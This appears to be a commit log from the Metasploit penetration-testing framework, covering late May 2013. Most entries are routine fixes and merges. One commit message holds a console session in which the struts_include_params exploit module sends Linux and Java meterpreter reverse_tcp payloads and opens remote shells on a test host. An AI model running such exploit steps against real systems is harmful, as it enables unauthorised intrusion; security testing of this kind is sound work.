47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
07203568bd
Performed changes to the correct operation of the module.
2013-05-29 20:50:28 -03:00
07c99f821e
Land #1879 , @dcbz ARM stagers
2013-05-29 17:43:37 -05:00
fff51e2e0c
Land #1882 , fix for CVE search from @jlee-r7
2013-05-29 17:00:32 -05:00
12f0448bb4
Use a LIKE test instead of equality
...
Fixes the ability to search for CVE (as well as other reference types)
with a non-exact match
[SeeRM #7989 ]
2013-05-29 16:27:33 -05:00
f76a50ae38
Land #1881 , @todb's fix for Redmine Bug 7991
2013-05-29 16:17:18 -05:00
e7a1f06fbc
Modules shouldn't be +x
2013-05-29 15:11:35 -05:00
8b8fb9f5ae
Merge pull request #1 from jvazquez-r7/arm_stagers
...
ARM stagers cleanup
2013-05-29 13:07:46 -07:00
7c41e239b4
Fix author name
2013-05-29 14:19:10 -05:00
e6433fc31e
Add commented source code for stagers and stage
2013-05-29 14:03:46 -05:00
52aae8e04c
Add small fixes for stagers
2013-05-29 14:01:59 -05:00
10d8bebe73
Start with a random username to test 401 codes
...
SeeRM #7991
While this fixes the specific case of tomcat_mgr_login, it doesn't
address the general case where modules are attempting to test code 401
responses in order to determine if bruteforcing should continue.
2013-05-29 12:36:28 -05:00
f0e3b0c124
Merge pull request #1836 from dmaloney-r7/bug/anyuser_anypass_http
...
Verified MSF specs passing, Pro on develop functional tests working (ran Bruteforce, saw normal and verbose output concerning that bruteforce was skipped for such a case and why, verified no cred saved with 'anyuser' user).
2013-05-29 07:44:18 -07:00
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
c3ab1ed2a5
Exploit module for Lianja SQL 1.0.0RC5.1
2013-05-29 08:48:41 -04:00
ec315ad50d
Modified URI handling to make use of target_uri and vars_get/post.
...
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
2c0f0f5f04
Changed reverse payload as suggested.
2013-05-28 21:52:16 -05:00
07c3565e3c
Made changes as suggested, forgot to remove exit() after testing was complete.
2013-05-28 21:31:36 -05:00
146284cdd5
Land #1876 , @wchen-r7's fix for Redmine 7984
2013-05-28 20:05:50 -05:00
ed5b8895bb
Fixes smart_migrate for a TypeError bug
...
Bug is: TypeError can't convert Rex::RuntimeError into String
[SeeRM: #7984 ]
2013-05-28 18:45:49 -05:00
63694a6c87
Landing #1875 - Also remove *.ts.rb files
2013-05-28 17:29:02 -05:00
b39531cea6
Added references
2013-05-28 23:15:10 +01:00
14c4dbcf8c
Also remove *.ts.rb files
...
On the heels of #1862 , this gets rid of the "test suites" that bound
together all the old unit tests.
2013-05-28 17:05:44 -05:00
a486fff9a4
Land #1872 , @wchen-r7's improvement of cold_fusion_version
2013-05-28 16:35:45 -05:00
96888455a7
Add new signature for CF9
2013-05-28 16:04:08 -05:00
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
0466cce7b1
Move PostMixin to its own file
...
Also replaces dead code in lib/msf/core/exploit/local.rb with what was
actually being used for the Exploit::Local class that lived in
lib/msf/core/exploit.rb.
2013-05-28 15:46:06 -05:00
8cb1bdefb7
Landing #1849 - 32 and 64bit compatible to_winpe_only() function
2013-05-28 15:24:43 -05:00
deea66b76f
Landing #1871 - fix an undefined variable bug in the DTP module
2013-05-28 15:13:20 -05:00
085b943107
Landing #1873 - mdm version bump
2013-05-28 15:03:39 -05:00
5b4c26146c
mdm version bump
2013-05-28 14:59:38 -05:00
b9969a8b2b
Landing #1855 - Updates for coldfusion_pwd_props for CF9 by ringt
2013-05-28 14:43:09 -05:00
0ecffea66f
Updates fingerprint() for CF10
2013-05-28 14:42:11 -05:00
a6a46f82bb
Updates the description a little bit
2013-05-28 14:31:56 -05:00
e4e5edc619
Looks like we don't need to check MD5, let's keep it that way then.
2013-05-28 14:31:15 -05:00
8ab90e657c
Adds a check for Cold Fusion 10
2013-05-28 14:21:29 -05:00
e20385dd9e
Merge pull request #1864 from dmaloney-r7/feature/task_associations/cred_service_host
...
Passes specs and functional tests
2013-05-28 12:11:57 -07:00
3857507d73
fix an undefined variable bug in the DTP module
2013-05-28 14:52:58 -04:00
7b43117d87
Added RCE for Struts versions earlier than 2.3.14.2
...
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
9843dc4cb4
Land #1708 , android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
d16d316658
Fixes mssql_findandsampledata & ms11_006_creat esizeddibsection
...
[FixRM:7987]
[FixRM:7986]
2013-05-28 11:15:17 -05:00
73aa14cb91
Landing #1868 - IBM SPSS SamplePower 3.0 module (CVE-2012-5946)
2013-05-28 11:02:21 -05:00
2861b70a34
Add a note about hooking msftidy
2013-05-28 10:44:23 -05:00
75d6c8079a
Spelling, whitespace
...
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
Console
Roberto Soares Espreto
jvazquez-r7
Tod Beardsley
James Lee
dcbz
Samuel Huckins
Spencer McIntyre
sinn3r
David Maloney